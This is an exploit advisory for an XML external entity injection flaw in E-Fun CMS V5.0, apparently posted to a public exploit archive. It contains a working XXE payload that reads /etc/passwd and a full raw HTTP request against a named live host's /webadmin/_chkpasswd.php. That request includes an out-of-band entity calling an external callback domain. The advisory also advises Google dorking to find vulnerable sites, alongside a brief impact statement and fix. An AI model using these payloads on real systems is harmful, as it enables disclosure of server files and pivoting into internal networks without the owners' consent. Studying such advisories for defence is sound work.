==================================================================================================================================== | # Title : E-Fun CMS V5.0 XML external entity injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) | | # Vendor : http://www.e-fun.com.tw/ | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Vulnerability description : XML supports a facility known as "external entities", which instruct an XML processor to retrieve and perform an inline include of XML located at a particular URI. An external XML entity can be used to append or modify the document type declaration (DTD) associated with an XML document. An external XML entity can also be used to include XML within the content of an XML document. Now assume that the XML processor parses data originating from a source under attacker control. Most of the time the processor will not be validating, but it MAY include the replacement text thus initiating an unexpected file open operation, or HTTP transfer, or whatever system ids the XML processor knows how to access. below is a sample XML document that will use this functionality to include the contents of a local file (/etc/passwd) target : http://127.0.0.1/landtopcomtw/webadmin/ <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE indoushka [ <!ENTITY indoushka SYSTEM "file:///etc/passwd"> ]> <xxx>&indoushka;</xxx> POST /webadmin/_chkpasswd.php HTTP/1.1 Content-type: text/xml Host: landtop.com.tw Content-Length: 175 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: */* <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE dt5fqyt [ <!ENTITY dt5fqytent SYSTEM "http://hityjSWv9cxlI.bxss.me/"> ]> <_chkpasswd.php>&dt5fqytent;</_chkpasswd.php> [+] Affected items : /webadmin/ /webadmin/_chkpasswd.php /webadmin/index.php [+] The impact of this vulnerability : Attacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier. Since the attack occurs relative to the application processing the XML document, an attacker may use this trusted application to pivot to other internal systems, possibly disclosing other internal content via http(s) requests. [+] How to fix this vulnerability : If possible it's recommended to disable parsing of XML external entities. Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | =======================================================================================================================================